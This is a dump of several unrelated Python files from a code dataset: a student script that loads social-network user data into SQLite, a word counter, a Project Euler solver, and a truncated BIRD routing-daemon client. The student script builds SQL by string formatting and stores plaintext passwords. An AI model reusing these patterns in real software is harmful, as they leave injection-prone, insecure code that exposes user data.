usage.save()\n","sub_path":"foodtrack/services/data_events.py","file_name":"data_events.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"55187309","text":"#!/usr/bin/python3.5\r\n\r\nimport sqlite3\r\nimport time\r\nimport datetime\r\nimport random\r\nimport cgi, cgitb, glob, os, re\r\nfrom base64 import b64encode\r\nfrom datetime import timedelta, datetime\r\n\r\n# Ensures a new database is created when initialising the script\r\nif (os.path.isfile('database.db')):\r\n\tos.remove('database.db') \r\nconn = sqlite3.connect('database.db')\r\nc = conn.cursor()\r\n\r\n# Defines a class for the user\r\nclass User:\r\n\tdef __init__(self, ID, name, email, password, birthday, mates, town, lat, long, program, courses):\r\n\t\tself.ID = ID\r\n\t\tself.name = name\r\n\t\tself.email = 
email\r\n\t\tself.password = password\r\n\t\tself.birthday = birthday\r\n\t\tself.mates = mates\r\n\t\tself.town = town\r\n\t\tself.lat = lat\r\n\t\tself.long = long\r\n\t\tself.program = program\r\n\t\tself.courses = courses\r\n\t\t\r\n# Defines a class for the post\r\nclass Post:\r\n\tdef __init__(self, ID, author, message, time, lat, long, comments):\r\n\t\tself.ID = ID\r\n\t\tself.author = author\r\n\t\tself.message = message\r\n\t\tself.time = time\r\n\t\tself.lat = lat\r\n\t\tself.long = long\r\n\t\tself.comments = comments\r\n\r\n# Defines a class for the comment\t\r\nclass Comment:\r\n\tdef __init__(self, ID, author, message, time):\r\n\t\tself.ID = ID\r\n\t\tself.author = author\r\n\t\tself.message = message\r\n\t\tself.time = time\r\n\t\t\r\ndef create_users_table():\r\n\tc.execute('CREATE TABLE IF NOT EXISTS users(id REAL PRIMARY KEY, full_name TEXT, email TEXT, password TEXT, birthday TEXT, mates TEXT,' \r\n\t\t\t 'home_suburb TEXT, home_latitude REAL, home_longitude REAL, program TEXT, courses TEXT, dp TEXT, session REAL, profile_text TEXT)')\r\n\tc.execute('ALTER TABLE users ADD COLUMN shipStat TEXT')\r\n\tconn.commit()\r\n\r\n# Creates a blank table 'Mates' where each column will be a different zID and all their mates\r\ndef create_mates_table():\r\n c.execute('CREATE TABLE IF NOT EXISTS mates(temp INTEGER PRIMARY KEY)')\r\n conn.commit() \r\n\r\ndef input_users(user_dir, parameters):\r\n\tusers = sorted(glob.glob(os.path.join(users_dir, \"*\")))\r\n\tfor user in users:\r\n\t\tuser_filename = os.path.join(user, \"user.txt\")\r\n\t\tuserP = extract_user_class(user_filename, user)\r\n\t\tsesh = b64encode(os.urandom(128)).decode('utf-8') # Generates a random session number for security\r\n\t\tif (os.path.isfile(os.path.join(user, \"profile.jpg\"))):\r\n\t\t\tdp = os.path.join(user, \"profile.jpg\")\r\n\t\telse:\r\n\t\t\tdp = None\r\n\t\tc.execute('INSERT OR IGNORE INTO users VALUES(\"{id}\", \"{nm}\", \"{em}\", \"{pw}\", \"{bd}\", \"{ma}\", \"{to}\", \"{la}\", \"{lo}\", \"{pg}\", \"{co}\", \"{dp}\", \"{sesh}\", \"\", \"\")'\\\r\n\t\t\t\t\t.format(id=userP.ID, nm=userP.name, em=userP.email, pw=userP.password, bd=userP.birthday, ma=userP.mates,\r\n\t\t\t\t\tto=userP.town, la=userP.lat, lo=userP.long, pg=userP.program, co=userP.courses, dp=dp, sesh=sesh))\r\n\t\tcreate_posts_table(user, userP.ID)\r\n\t\tupdate_mates_table(userP)\r\n\tconn.commit()\r\n\r\ndef create_posts_table(user, ID):\r\n\tpost_dir = os.path.join(user, \"posts\")\r\n\tposts = sorted(glob.glob(os.path.join(post_dir,\"*\")))\r\n\ttb_name = ID+\"_posts\"\r\n\tc.execute('CREATE TABLE IF NOT EXISTS \"{tb}\"(id REAL PRIMARY KEY, author TEXT, time datetime, message TEXT, lat REAL, long REAL, comments REAL)'.format(tb=tb_name))\r\n\ti = 0\r\n\tfor p in posts:\r\n\t\tpost_filename = os.path.join(p, \"post.txt\")\r\n\t\tpostP = extract_posts(post_filename, p, ID)\r\n\t\tc.execute('INSERT OR IGNORE INTO {tb} VALUES(\"{id}\", \"{au}\", \"{tm}\", \"{msg}\", \"{la}\", \"{lo}\", \"{com}\")'\\\r\n\t\t\t.format(tb=tb_name, id=postP.ID, au=postP.author, tm=postP.time, msg=postP.message, la=postP.lat, lo=postP.long, com=postP.comments))\r\n\t\tc.execute('INSERT OR IGNORE INTO allPosts VALUES(\"{id}\", \"{au}\", \"{tm}\", \"{msg}\", \"{com}\")'\\\r\n\t\t\t.format(tb=tb_name, id=postP.ID, au=postP.author, tm=postP.time, msg=postP.message, com=postP.comments))\r\n\t\tif (postP.comments == 1):\t\r\n\t\t\tcreate_comments_table(p, postP.ID)\r\n\tconn.commit()\r\n\t\r\ndef create_all_posts_table():\r\n\tc.execute('CREATE TABLE IF NOT 
EXISTS allPosts (id REAL PRIMARY KEY, author TEXT, time datetime, message TEXT, comments REAL)')\r\n\tconn.commit()\r\n\t\r\n\t\r\ndef create_comments_table(post, ID):\r\n\tcomment_dir = os.path.join(post, \"comments\")\r\n\tcomments = sorted(glob.glob(os.path.join(comment_dir,\"*\")))\r\n\ttb_name = ID+\"_comments\"\r\n\tc.execute('CREATE TABLE IF NOT EXISTS \"{tb}\"(id REAL PRIMARY KEY, author TEXT, time datetime, message TEXT)'.format(tb=tb_name))\r\n\ti = 0\r\n\tfor com in comments:\r\n\t\tcomments_filename = os.path.join(com, \"comment.txt\")\r\n\t\tcommentP = extract_comments(comments_filename, com, ID)\r\n\t\tc.execute('INSERT OR IGNORE INTO {tb} VALUES(\"{id}\", \"{au}\", \"{tm}\", \"{msg}\")'\\\r\n\t\t\t.format(tb=tb_name, id=commentP.ID, au=commentP.author, tm=commentP.time, msg=commentP.message))\r\n\r\n\tconn.commit()\r\n\r\n# Inputs mates into the mates table. Structured inversely to other tables (each col is a list of mates for a certain zid)\r\ndef update_mates_table(user):\r\n c.execute('SELECT mates FROM users WHERE id=\"{id}\"'.format(id=user.ID))\r\n data = c.fetchall()\r\n mates = []\r\n mates = data[0][0].split(', ')\r\n mates[0] = re.sub(r'\\[','',mates[0])\r\n mates[-1] = re.sub(r'\\]','',mates[-1])\r\n c.execute('ALTER TABLE mates ADD COLUMN \"{id}\" TEXT'.format(id=user.ID))\r\n for mate in mates:\r\n c.execute('INSERT OR IGNORE INTO mates ({col}) VALUES (\"{mate}\")'.format(col=user.ID, mate=mate))\r\n conn.commit()\r\n\r\n# Extract all the different programs of all users and fills the table.\r\ndef extract_programs():\r\n c.execute('CREATE TABLE IF NOT EXISTS programs (program TEXT PRIMARY KEY)')\r\n c.execute('SELECT program FROM users')\r\n data = c.fetchall()\r\n dataCulled = list(set(data))\r\n programs = []\r\n for i in dataCulled:\r\n programs.append(i[0])\r\n\r\n for program in programs:\r\n c.execute('SELECT id FROM users WHERE program=\"{pr}\"'.format(pr=program))\r\n users = c.fetchall()\r\n c.execute('INSERT OR IGNORE INTO programs(program) VALUES (\"{prog}\")'.format(prog=program)) \r\n # Obtain number of columns in programs table\r\n c.execute('PRAGMA table_info(programs)')\r\n colNum = len(c.fetchall())\r\n \r\n # If num columns is < num people in program, add cols\r\n while (colNum < len(users) + 1):\r\n colName = \"mate_no\"+str(colNum)\r\n c.execute('ALTER TABLE programs ADD COLUMN \"{col}\" TEXT'.format(col=colName))\r\n c.execute('PRAGMA table_info(programs)')\r\n colNum = len(c.fetchall())\r\n \r\n # Now input into row\r\n counter = int(1)\r\n \r\n for user in users:\r\n colName = \"mate_no\"+str(counter)\r\n c.execute('UPDATE programs SET {col} = (\"{zid}\") WHERE program = \"{prog}\"'.format(col=colName, zid=user[0], prog = program))\r\n counter += 1\r\n conn.commit()\r\n \r\n\r\n# Extract all the different courses of all users and fills the table.\r\ndef extract_courses():\r\n c.execute('CREATE TABLE IF NOT EXISTS courses (course TEXT PRIMARY KEY)')\r\n c.execute('SELECT courses FROM users')\r\n data = c.fetchall()\r\n dataCulled = list(set(data))\r\n allCourses = []\r\n for i in dataCulled:\r\n courses = []\r\n courses = i[0].split(', ')\r\n courses[0] = re.sub(r'\\[','',courses[0])\r\n courses[-1] = re.sub(r'\\]','',courses[-1])\r\n allCourses.extend(courses)\r\n \r\n # Make sure all elements are unique\r\n uniCourses = list(set(allCourses))\r\n \r\n for course in uniCourses:\r\n c.execute('SELECT id FROM users WHERE courses LIKE \"{co}\"'.format(co=course))\r\n users = c.fetchall()\r\n c.execute('INSERT OR IGNORE INTO courses (course) 
VALUES (\"{co}\")'.format(co=course)) \r\n # Obtain number of columns in courses table\r\n c.execute('PRAGMA table_info(courses)')\r\n colNum = len(c.fetchall())\r\n \r\n # If num columns is < num people in courses, add cols\r\n while (colNum < len(users) + 1):\r\n colName = \"mate_no\"+str(colNum)\r\n print (\"Creating: \"+colName)\r\n c.execute('ALTER TABLE courses ADD COLUMN \"{col}\" TEXT'.format(col=colName))\r\n c.execute('PRAGMA table_info(courses)')\r\n colNum = len(c.fetchall())\r\n \r\n # Now input into row\r\n counter = int(1)\r\n \r\n for user in users:\r\n print (user,course)\r\n colName = \"mate_no\"+str(counter)\r\n print (\"Doin \"+colName)\r\n c.execute('UPDATE courses SET {col} = (\"{zid}\") WHERE course = \"{co}\"'.format(col=colName, zid=user[0], co = course))\r\n counter += 1\r\n conn.commit()\r\n \r\n\t\r\n\t\r\ndef extract_user_class(user_filename, user):\t\r\n\t# Initialise to unset variables\r\n\tID = re.sub(r'^.*/', '', user)\r\n\tname = None\r\n\temail = None\r\n\tpassword = None\r\n\tbirthday = None\r\n\tmates = None\r\n\ttown = None\r\n\tlat = None\r\n\tlong = None\r\n\tprogram = None\r\n\tcourses = None\r\n\twith open(user_filename) as f:\r\n\t\tfor line in f:\r\n\t\t\tx,y = re.split('=', line, 2)\r\n\t\t\ty = re.sub(\"\\s*$\", \"\", y)\r\n\t\t\tif (x == \"full_name\"):\r\n\t\t\t\tname = y\r\n\t\t\telif (x == \"email\"):\r\n\t\t\t\temail = y\r\n\t\t\telif (x == \"password\"):\r\n\t\t\t\tpassword = y\r\n\t\t\telif (x == \"birthday\"):\r\n\t\t\t\tbirthday = y\r\n\t\t\telif (x == \"mates\"):\r\n\t\t\t\tmates = y\r\n\t\t\telif (x == \"home_suburb\"):\r\n\t\t\t\ttown = y\r\n\t\t\telif (x == \"home_latitude\"):\r\n\t\t\t\tlat = y\r\n\t\t\telif (x == \"home_longitude\"):\r\n\t\t\t\tlong = y\r\n\t\t\telif (x == \"program\"):\r\n\t\t\t\tprogram = y.replace('\\n','')\r\n\t\t\telif (x == \"courses\"):\r\n\t\t\t\tcourses = y\r\n\tu = User(ID, name, email, password, birthday, mates, town, lat, long, program, courses)\r\n\treturn u\r\n\t\r\ndef extract_posts(post_filename, post, userID):\r\n\t# Initialise unset variables \r\n\tID = userID+\"_\"+ re.sub(r'^.*/.*/', '', post)\r\n\tauthor = None\r\n\tmessage = None\r\n\ttime = None\r\n\tlat = None\r\n\tlong = None\r\n\t\r\n\t# Checks if there are any comments for the post by checking if directory exists\r\n\tif (os.path.isdir(os.path.join(post,'comments'))):\r\n\t\tcomments = 1 \r\n\telse:\r\n\t\tcomments = 0\r\n\t\r\n\twith open(post_filename) as f:\r\n\t\tfor line in f:\r\n\t\t\targs = line.partition('=')\r\n\t\t\tx = args[0]\r\n\t\t\ty = args[2]\r\n\t\t\tif (x == \"from\"):\r\n\t\t\t\tauthor = y\r\n\t\t\t\tauthor = re.sub(\"\\n\", \"\", author)\r\n\t\t\telif (x == \"message\"):\r\n\t\t\t\toldMessage = y\r\n\t\t\t\tmessage = re.sub(r'\"', '!@#$%^&*', oldMessage) # Getting caught by the \"\", make sure to regex revert when displaying message\r\n\t\t\telif (x == \"time\"):\r\n\t\t\t\ttime = timeConversion(y)\r\n\t\t\telif (x == \"latitude\"):\r\n\t\t\t\tlat = y\r\n\t\t\telif (x == \"longitude\"):\r\n\t\t\t\tlong = y\r\n\tp = Post(ID, author, message, time, lat, long, comments)\r\n\treturn p\r\n\r\ndef extract_comments(comments_filename, c, ID):\r\n\t# Initialise unset variables \r\n\tID = ID+\"_\"+ re.sub(r'^.*/.*/.*/', '', c)\r\n\tauthor = None\r\n\tmessage = None\r\n\ttime = None\r\n\twith open(comments_filename) as f:\r\n\t\tfor line in f:\r\n\t\t\targs = line.partition('=')\r\n\t\t\tx = args[0]\r\n\t\t\ty = args[2]\r\n\t\t\tif (x == \"from\"):\r\n\t\t\t\tauthor = y\r\n\t\t\t\tauthor = re.sub(\"\\n\", \"\", 
author)\r\n\t\t\telif (x == \"message\"):\r\n\t\t\t\toldMessage = y\r\n\t\t\t\tmessage = re.sub(r'\"', '!@#$%^&*', oldMessage) # Getting caught by the \"\", make sure to regex revert when displaying message\r\n\t\t\telif (x == \"time\"):\r\n\t\t\t\ttime = timeConversion(y)\r\n\tc = Comment(ID, author, message, time)\r\n\treturn c\r\n\r\n# Replaces timestamp with a nicer format, from http://stackoverflow.com/questions/17494250/convert-timestamps-of-yyyy-mm-ddthhmmss-sssz-format-in-python\r\ndef timeConversion(string):\r\n\tnewTime = datetime.strptime(string[:-5], \"%Y-%m-%dT%H:%M:%S+\")\r\n\t#newTime = time.strftime('%I:%M - %b %d, %Y')\r\n\treturn newTime\t\r\n\t\r\n\r\ncreate_users_table()\r\ncreate_mates_table()\r\ncreate_all_posts_table()\r\nusers_dir = \"dataset-medium\"\r\nparameters = cgi.FieldStorage()\r\ninput_users(users_dir, parameters)\r\nextract_programs()\r\nextract_courses()\r\nc.close()\r\nconn.close()\r\n","sub_path":"subjects/cs2041/public_html/ass2/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":11539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"289346171","text":"# Next feature: import random\nimport string\n\nDebug = 1\n\nTargetWords = [\"the\",\"The\"]\n\n# Predicate: Debug\ndef debug():\n if Debug > 0:\n return True\n else:\n return False\n\n\n# Predicate: Verbose Debug\ndef verbose():\n if Debug > 1:\n return True\n else:\n return False\n\n\n# Read single line from standard in and handle EOF\ndef safe_input(prompt):\n try:\n wordInput = input(prompt)\n return(wordInput, True)\n except EOFError:\n return(\"\", False)\n\n\n# Process single line of input\ndef check_line(word,theCount,skipCount,uWords,uFirstLetter):\n if word in TargetWords:\n theCount = theCount + 1\n if verbose():\n print(\"Count %d. %s\" % (theCount, word))\n else:\n if verbose():\n print(\"Skip '%s' \" % (word))\n skipCount = skipCount + 1\n\n # Do other statistics gathering\n if word not in uWords:\n uWords.append(word)\n\n if word[0].isalpha() and (word[0].lower() not in uFirstLetter):\n uFirstLetter.append(word[0].lower())\n\n return(theCount,skipCount,uWords,uFirstLetter)\n\n\n# Process all input\ndef process_input(theCount,skipCount,uWords,uFirstLetter):\n cFlag = True\n while cFlag:\n word, cFlag = safe_input(\"\")\n if not cFlag:\n break\n theCount,skipCount,uniqueWords,uniqueFirstLetter = check_line(word,theCount,skipCount,uWords,uFirstLetter)\n\n return(theCount,skipCount,uWords,uFirstLetter)\n\n\n# Process input, then output statistics\n#\t\"Extreme\" example of avoiding global variables\ndef main():\n theCount,skipCount,uniqueWords,uniqueFirstLetter = process_input(0,0,[],[])\n\n if debug():\n print(\"Target Words: \", TargetWords)\n print(\"Found count %d. Skipped %d. 
All words %d.\" %\n (theCount, skipCount, theCount + skipCount))\n if verbose():\n print(uniqueWords)\n print(\"Unique word count: %d.\" % (len(uniqueWords)), uniqueWords[0:5])\n uniqueFirstLetter.sort()\n print(\"Found %s\" % \"\".join(uniqueFirstLetter))\n print(\"Alphabet %s\" % string.ascii_lowercase)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/word-counter/v3/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293403486","text":"# Counting summations\n# Problem 76\n\n# It is possible to write five as a sum in exactly six different ways:\n\n# 4 + 1\n# 3 + 2\n# 3 + 1 + 1\n# 2 + 2 + 1\n# 2 + 1 + 1 + 1\n# 1 + 1 + 1 + 1 + 1\n\n# How many different ways can one hundred be written as a sum of at least two positive integers?\n\nimport time\nimport math\n\ndef solve(n):\n tStart = time.time()\n ways = [[0 for _ in range(n+2)] for _ in range(n+2)]\n print(getWays(n, n-1, ways)) \n print(\"Run Time = \" + str(time.time() - tStart))\n \ndef getWays(sum, maxSummand, ways):\n if maxSummand >= sum:\n return 1 + getWays(sum, sum-1, ways)\n if not ways[sum][maxSummand] == 0:\n return ways[sum][maxSummand]\n w = 0\n # w = sum(list(map(lambda i: getWays(sum-i,i, ways), range(1, maxSummand+1))))\n for i in range(1, maxSummand+1):\n w += getWays(sum-i, i, ways)\n ways[sum][maxSummand] = w\n return w","sub_path":"problem76.py","file_name":"problem76.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"260757913","text":"from builtins import str\nfrom builtins import next\nfrom builtins import object\n\nimport re\nimport socket\nfrom datetime import datetime, timedelta\n\n\nclass PyBird(object):\n ignored_field_numbers = [0, 1, 13, 1008, 2002, 9001]\n\n def __init__(self, socket_file, dummy=False):\n \"\"\"Basic pybird setup.\n Required argument: socket_file: full path to the BIRD control socket.\"\"\"\n self.socket_file = socket_file\n self.clean_input_re = re.compile('\\W+')\n self.field_number_re = re.compile('^(\\d+)[ -]')\n self.routes_field_re = re.compile('(\\d+) imported, (\\d+) exported')\n self.dummy = dummy\n\n def get_bird_status(self):\n \"\"\"Get the status of the BIRD instance. 
Returns a dict with keys:\n - router_id (string)\n - last_reboot (datetime)\n - last_reconfiguration (datetime)\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'communities': '65520:79 65521:421'},\n {'prefix': '2002::/16', 'as_path': '65520',\n 'communities': '65520:1234'},\n ]\n query = \"show status\"\n data = self._send_query(query)\n\n line_iterator = iter(data.splitlines())\n data = {}\n\n for line in line_iterator:\n line = line.strip()\n (field_number, line) = self._extract_field_number(line)\n\n if field_number in self.ignored_field_numbers:\n continue\n\n if field_number == 1011:\n # Parse the status section, which looks like:\n # 1011-Router ID is 195.69.146.34\n # Current server time is 10-01-2012 10:24:37\n # Last reboot on 03-01-2012 12:46:40\n # Last reconfiguration on 03-01-2012 12:46:40\n data['router_id'] = self._parse_router_status_line(line)\n line = next(line_iterator) # skip current server time\n data['last_reboot'] = self._parse_router_status_line(\n next(line_iterator), parse_date=True)\n data['last_reconfiguration'] = self._parse_router_status_line(\n next(line_iterator), parse_date=True)\n\n return data\n\n def _parse_router_status_line(self, line, parse_date=False):\n \"\"\"Parse a line like:\n Current server time is 10-01-2012 10:24:37\n optionally (if parse_date=True), parse it into a datetime\"\"\"\n data = line.strip().split(' ', 3)[-1]\n if parse_date:\n return datetime.strptime(data, '%d-%m-%Y %H:%M:%S')\n else:\n return data\n\n def get_peer_prefixes_announced(self, peer_name):\n \"\"\"Get prefixes announced by a specific peer, without applying\n filters - i.e. this includes routes which were not accepted\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n {'prefix': '2002::/16', 'as_path': '65520',\n 'community': '65520:1234'},\n ]\n clean_peer_name = self._clean_input(peer_name)\n query = \"show route table T_%s all protocol %s\" % (\n clean_peer_name, clean_peer_name)\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def get_peer_prefixes_exported(self, peer_name):\n \"\"\"Get prefixes exported TO a specific peer\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n {'prefix': '2002::/16', 'as_path': '65520',\n 'community': '65520:1234'},\n ]\n clean_peer_name = self._clean_input(peer_name)\n query = \"show route all table T_%s export %s\" % (\n clean_peer_name, clean_peer_name)\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def get_peer_prefixes_accepted(self, peer_name):\n \"\"\"Get prefixes announced by a specific peer, which were also\n accepted by the filters\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n ]\n query = \"show route all protocol %s\" % self._clean_input(peer_name)\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def get_peer_prefixes_rejected(self, peer_name):\n announced = self.get_peer_prefixes_announced(peer_name)\n accepted = self.get_peer_prefixes_accepted(peer_name)\n\n announced_prefixes = [i['prefix'] for i in announced]\n accepted_prefixes = [i['prefix'] for i in accepted]\n\n rejected_prefixes = [\n item for item in announced_prefixes if item not in accepted_prefixes]\n rejected_routes = [item for item in announced if item[\n 'prefix'] in rejected_prefixes]\n return rejected_routes\n\n def 
get_prefix_info(self, prefix, peer_name=None):\n \"\"\"Get route-info for specified prefix\"\"\"\n if self.dummy:\n return [\n {'prefix': '2001:db8:/32', 'as_path': '65520',\n 'community': '65520:79 65521:421'},\n ]\n query = \"show route for %s all\" % prefix\n if (peer_name is not None):\n query += \" protocol %s\" % peer_name\n data = self._send_query(query)\n return self._parse_route_data(data)\n\n def _parse_route_data(self, data):\n \"\"\"Parse a blob like:\n 0001 BIRD 1.3.3 ready.\n 1007-2a02:898::/32 via 2001:7f8:1::a500:8954:1 on eth1 [PS2 12:46] * (100) [AS8283i]\n 1008-\tType: BGP unicast univ\n 1012-\tBGP.origin: IGP\n BGP.as_path: 8954 8283\n BGP.next_hop: 2001:7f8:1::a500:8954:1 fe80::21f:caff:fe16:e02\n BGP.local_pref: 100\n BGP.community: (8954,620)\n [....]\n 0000\n \"\"\"\n lines = data.splitlines()\n routes = []\n\n route_summary = None\n\n line_counter = -1\n while line_counter < len(lines) - 1:\n line_counter += 1\n line = lines[line_counter].strip()\n (field_number, line) = self._extract_field_number(line)\n\n if field_number in self.ignored_field_numbers:\n continue\n\n if field_number == 1007:\n route_summary = self._parse_route_summary(line)\n\n route_detail = None\n if field_number == 1012:\n if not route_summary:\n # This is not detail of a BGP route\n continue\n\n # A route detail spans multiple lines, read them all\n route_detail_raw = []\n while 'BGP.' in line:\n route_detail_raw.append(line)\n line_counter += 1\n line = lines[line_counter]\n # this loop will have walked a bit too far, correct it\n line_counter -= 1\n\n route_detail = self._parse_route_detail(route_detail_raw)\n\n # Save the summary+detail info in our result\n route_detail.update(route_summary)\n routes.append(route_detail)\n # Do not use this summary again on the next run\n route_summary = None\n if field_number == 8001:\n # network not in table\n return []\n return routes\n\n def _parse_route_summary(self, line):\n \"\"\"Parse a line like:\n 2a02:898::/32 via 2001:7f8:1::a500:8954:1 on eth1 [PS2 12:46] * (100) [AS8283i]\n \"\"\"\n # Note that split acts on sections of whitespace - not just single\n # chars\n elements = line.strip().split()\n return {'prefix': elements[0], 'peer': elements[2]}\n\n def _parse_route_detail(self, lines):\n \"\"\"Parse a blob like:\n 1012-\tBGP.origin: IGP\n BGP.as_path: 8954 8283\n BGP.next_hop: 2001:7f8:1::a500:8954:1 fe80::21f:caff:fe16:e02\n BGP.local_pref: 100\n BGP.community: (8954,620)\n \"\"\"\n attributes = {}\n\n for line in lines:\n line = line.strip()\n # remove 'BGP.'\n line = line[4:]\n parts = line.split(\": \")\n if len(parts) == 2:\n (key, value) = parts\n else:\n # handle [BGP.atomic_aggr:]\n key = parts[0].strip(\":\")\n value = True\n\n if key == 'community':\n # convert (8954,220) (8954,620) to 8954:220 8954:620\n value = value.replace(\",\", \":\").replace(\n \"(\", \"\").replace(\")\", \"\")\n\n attributes[key] = value\n\n return attributes\n\n def get_peer_status(self, peer_name=None):\n \"\"\"Get the status of all peers or a specific peer.\n\n Optional argument: peer_name: case-sensitive full name of a peer,\n as configured in BIRD.\n\n If no argument is given, returns a list of peers - each peer represented\n by a dict with fields. See README for a full list.\n\n If a peer_name argument is given, returns a single peer, represented\n as a dict. 
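# A quick, standalone illustration of the community normalisation done by
# _parse_route_detail above: BIRD prints communities as "(asn,value)" pairs,
# and the chained str.replace calls turn them into the usual "asn:value" form.
raw = "(8954,220) (8954,620)"
normalised = raw.replace(",", ":").replace("(", "").replace(")", "")
assert normalised == "8954:220 8954:620"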
If the peer is not found, returns None.\n \"\"\"\n dummy_data = [\n {'up': True, 'state': 'dummy', 'last_change': datetime.now() - timedelta(days=2),\n 'routes_imported': 1, 'routes_exported': 10, 'router_id': \"192.168.1.1\"},\n {'up': True, 'state': 'dummy', 'last_change': datetime.now() - timedelta(days=20),\n 'routes_imported': 1, 'routes_exported': 10, 'router_id': \"192.168.12.42\"},\n {'up': False, 'state': 'dummy', 'last_change': datetime.now() -\n timedelta(hours=2), },\n ]\n\n if peer_name:\n if self.dummy:\n peering_id = int(peer_name[2:])\n return dummy_data[peering_id % 3]\n query = 'show protocols all \"%s\"' % self._clean_input(peer_name)\n else:\n if self.dummy:\n return dummy_data\n query = 'show protocols all'\n\n data = self._send_query(query)\n peers = self._parse_peer_data(data=data, data_contains_detail=True)\n\n if not peer_name:\n return peers\n\n if len(peers) == 0:\n return None\n elif len(peers) > 1:\n raise ValueError(\n \"Searched for a specific peer, but got multiple returned from BIRD?\")\n else:\n return peers[0]\n\n def _parse_peer_data(self, data, data_contains_detail):\n \"\"\"Parse the data from BIRD to find peer information.\"\"\"\n lineiterator = iter(data.splitlines())\n peers = []\n\n peer_summary = None\n\n for line in lineiterator:\n line = line.strip()\n (field_number, line) = self._extract_field_number(line)\n\n if field_number in self.ignored_field_numbers:\n continue\n\n if field_number == 1002:\n peer_summary = self._parse_peer_summary(line)\n if peer_summary['protocol'] != 'BGP':\n peer_summary = None\n continue\n\n # If there is no detail section to be expected,\n # we are done.\n if not data_contains_detail:\n peers.append_peer_summary()\n continue\n\n peer_detail = None\n if field_number == 1006:\n if not peer_summary:\n # This is not detail of a BGP peer\n continue\n\n # A peer summary spans multiple lines, read them all\n peer_detail_raw = []\n while line.strip() != \"\":\n peer_detail_raw.append(line)\n line = next(lineiterator)\n\n peer_detail = self._parse_peer_detail(peer_detail_raw)\n\n # Save the summary+detail info in our result\n peer_detail.update(peer_summary)\n peers.append(peer_detail)\n # Do not use this summary again on the next run\n peer_summary = None\n\n return peers\n\n def _parse_peer_summary(self, line):\n \"\"\"Parse the summary of a peer line, like:\n PS1 BGP T_PS1 start Jun13 Passive\n\n Returns a dict with the fields:\n name, protocol, last_change, state, up\n (\"PS1\", \"BGP\", \"Jun13\", \"Passive\", False)\n\n \"\"\"\n elements = line.split()\n\n try:\n if ':' in elements[5]: # newer versions include a timestamp before the state\n state = elements[6]\n else:\n state = elements[5]\n up = (state.lower() == \"established\")\n except IndexError:\n state = None\n up = None\n\n raw_datetime = elements[4]\n last_change = self._calculate_datetime(raw_datetime)\n\n return {\n 'name': elements[0],\n 'protocol': elements[1],\n 'last_change': last_change,\n 'state': state,\n 'up': up,\n }\n\n def _parse_peer_detail(self, peer_detail_raw):\n \"\"\"Parse the detailed peer information from BIRD, like:\n\n 1006- Description: Peering AS8954 - InTouch\n Preference: 100\n Input filter: ACCEPT\n Output filter: ACCEPT\n Routes: 24 imported, 23 exported, 0 preferred\n Route change stats: received rejected filtered ignored accepted\n Import updates: 50 3 19 0 0\n Import withdraws: 0 0 --- 0 0\n Export updates: 0 0 0 --- 0\n Export withdraws: 0 --- --- --- 0\n BGP state: Established\n Session: external route-server AS4\n Neighbor AS: 
8954\n Neighbor ID: 85.184.4.5\n Neighbor address: 2001:7f8:1::a500:8954:1\n Source address: 2001:7f8:1::a519:7754:1\n Neighbor caps: refresh AS4\n Route limit: 9/1000\n Hold timer: 112/180\n Keepalive timer: 16/60\n\n peer_detail_raw must be an array, where each element is a line of BIRD output.\n\n Returns a dict with the fields, if the peering is up:\n routes_imported, routes_exported, router_id\n and all combinations of:\n [import,export]_[updates,withdraws]_[received,rejected,filtered,ignored,accepted]\n wfor which the value above is not \"---\"\n\n \"\"\"\n result = {}\n\n route_change_fields = [\n \"import updates\", \"import withdraws\", \"export updates\", \"export withdraws\"]\n\n lineiterator = iter(peer_detail_raw)\n\n for line in lineiterator:\n line = line.strip()\n (field, value) = line.split(\":\", 1)\n value = value.strip()\n\n if field.lower() == \"routes\":\n routes = self.routes_field_re.findall(value)[0]\n result['routes_imported'] = int(routes[0])\n result['routes_exported'] = int(routes[1])\n\n if field.lower() in route_change_fields:\n (received, rejected, filtered, ignored, accepted) = value.split()\n key_name_base = field.lower().replace(' ', '_')\n self._parse_route_stats(\n result, key_name_base + '_received', received)\n self._parse_route_stats(\n result, key_name_base + '_rejected', rejected)\n self._parse_route_stats(\n result, key_name_base + '_filtered', filtered)\n self._parse_route_stats(\n result, key_name_base + '_ignored', ignored)\n self._parse_route_stats(\n result, key_name_base + '_accepted', accepted)\n\n if field.lower() == \"neighbor id\":\n result['router_id'] = value\n\n return result\n\n def _parse_route_stats(self, result_dict, key_name, value):\n if value.strip() == \"---\":\n return\n result_dict[key_name] = int(value)\n\n def _extract_field_number(self, line):\n \"\"\"Parse the field type number from a line.\n Line must start with a number, followed by a dash or space.\n\n Returns a tuple of (field_number, cleaned_line), where field_number\n is None if no number was found, and cleaned_line is the line without\n the field number, if applicable.\n \"\"\"\n matches = self.field_number_re.findall(line)\n\n if len(matches):\n field_number = int(matches[0])\n cleaned_line = self.field_number_re.sub('', line).strip('-')\n return (field_number, cleaned_line)\n else:\n return (None, line)\n\n def _calculate_datetime(self, value):\n \"\"\"Turn the BIRD date format into a python datetime.\"\"\"\n now = datetime.now()\n # Case 1: YYYY-MM-DD HH:MM:SS\n try:\n return datetime(int(value[:4]), int(value[5:7]), int(value[8:10]), int(value[11:13]), int(value[14:16]), int(value[17:19]))\n except ValueError:\n pass\n\n # Case 1: YYYY-MM-DD\n try:\n return 